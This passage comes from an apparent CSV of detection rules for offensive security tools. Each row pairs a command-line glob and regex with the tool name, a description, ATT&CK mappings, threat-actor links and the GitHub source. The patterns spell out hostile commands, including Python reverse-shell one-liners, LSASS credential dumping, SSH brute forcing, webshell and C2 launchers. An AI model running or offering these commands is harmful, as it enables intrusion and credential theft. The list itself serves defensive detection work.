Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","56052" "*python 3 st teamserver *",".{0,1000}python\s3\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56053" "*python argus.py*",".{0,1000}python\sargus\.py.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","N/A","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","56054" "*python barrel.go -o debugproc*",".{0,1000}python\sbarrel\.go\s\-o\sdebugproc.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56055" 
"*python barrel.py -o debugproc*",".{0,1000}python\sbarrel\.py\s\-o\sdebugproc.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56056" "*python -c ""import fetch""*",".{0,1000}python\s\-c\s\""import\sfetch\"".{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","56057" "*python -c*'import socket,subprocess,os'*socket.socket(socket.AF_INET*connect((""*))*dup2*pty.spawn(""sh"")'*",".{0,1000}python\s\-c.{0,1000}\'import\ssocket,subprocess,os\'.{0,1000}socket\.socket\(socket\.AF_INET.{0,1000}connect\(\(\"".{0,1000}\)\).{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\)\'.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56059" "*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56060" "*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56061" "*python -c*socket.socket()*connect*dup2*pty.spawn(""bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56062" "*python -c*socket.socket()*connect*dup2*pty.spawn(""cmd"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""cmd\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56063" "*python -c*socket.socket()*connect*dup2*pty.spawn(""powershell"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""powershell\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 
- T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56064" "*python -c*socket.socket()*connect*dup2*pty.spawn(""pwsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""pwsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56065" "*python -c*socket.socket()*connect*dup2*pty.spawn(""sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56066" "*python -c*socket.socket()*connect*dup2*pty.spawn(""zsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""zsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56067" "*python create_dump.py *",".{0,1000}python\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - 
T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56068" "*python dkmc.py*",".{0,1000}python\sdkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","56069" "*python kraken.py -*",".{0,1000}python\skraken\.py\s\-.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","56070" "*python lock.py -o disk*",".{0,1000}python\slock\.py\s\-o\sdisk.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56071" "*python -m orbitaldump *",".{0,1000}python\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","56073" "*python -m peas -u *",".{0,1000}python\s\-m\speas\s\-u\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","56074" "*python -m rarce *",".{0,1000}python\s\-m\srarce\s.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56075" "*python -m venv ADcheck*",".{0,1000}python\s\-m\svenv\sADcheck.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","56077" "*python main.py --KEY=* --URL=*127.0.0.1*",".{0,1000}python\smain\.py\s\-\-KEY\=.{0,1000}\s\-\-URL\=.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","56078" "*python noPac.*",".{0,1000}python\snoPac\..{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","56079" "*python raiseChild.py -*",".{0,1000}python\sraiseChild\.py\s\-.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56080" "*python reuse.py --start --rhost * --rport *",".{0,1000}python\sreuse\.py\s\-\-start\s\-\-rhost\s.{0,1000}\s\-\-rport\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","56081" "*python reverse_http.py*",".{0,1000}python\sreverse_http\.py.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - 
T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","56082" "*python rsf.py*",".{0,1000}python\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56083" "*python scshell*",".{0,1000}python\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth 
Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","56084" "*python shock.py -o knwondlls*",".{0,1000}python\sshock\.py\s\-o\sknwondlls.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56085" "*python st.py*",".{0,1000}python\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56086" "*python tinar.py*",".{0,1000}python\stinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","56087" "*python* -c 'import os,pty,socket*socket.socket()*s.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\sos,pty,socket.{0,1000}socket\.socket\(\).{0,1000}s\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56088" "*python* -c 'import 
socket,subprocess,os;*socket.socket(socket.AF_INET,socket.SOCK_STREAM)*.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\ssocket,subprocess,os\;.{0,1000}socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\).{0,1000}\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56089" "*python* pachine.py*",".{0,1000}python.{0,1000}\spachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","56090" "*python*charlotte.py*",".{0,1000}python.{0,1000}charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","56091" "*python*http://*:6970/ConfigFileCacheList.txt*",".{0,1000}python.{0,1000}http\:\/\/.{0,1000}\:6970\/ConfigFileCacheList\.txt.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","56092" 
"*python*'http://*SEP*:6970/*.cnf.xml*",".{0,1000}python.{0,1000}\'http\:\/\/.{0,1000}SEP.{0,1000}\:6970\/.{0,1000}\.cnf\.xml.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","56093" "*python*https://*:8443/cucm-uds/users?name=*",".{0,1000}python.{0,1000}https\:\/\/.{0,1000}\:8443\/cucm\-uds\/users\?name\=.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","56094" "*python.exe* create_dump.py *",".{0,1000}python\.exe.{0,1000}\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56095" "*python_modules/keyboard.zip*",".{0,1000}python_modules\/keyboard\.zip.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56097" "*python2??/generator.py*",".{0,1000}python2\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56098" "*python2??/PyLoader.py*",".{0,1000}python2\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56099" "*python3 ./exp.py --url 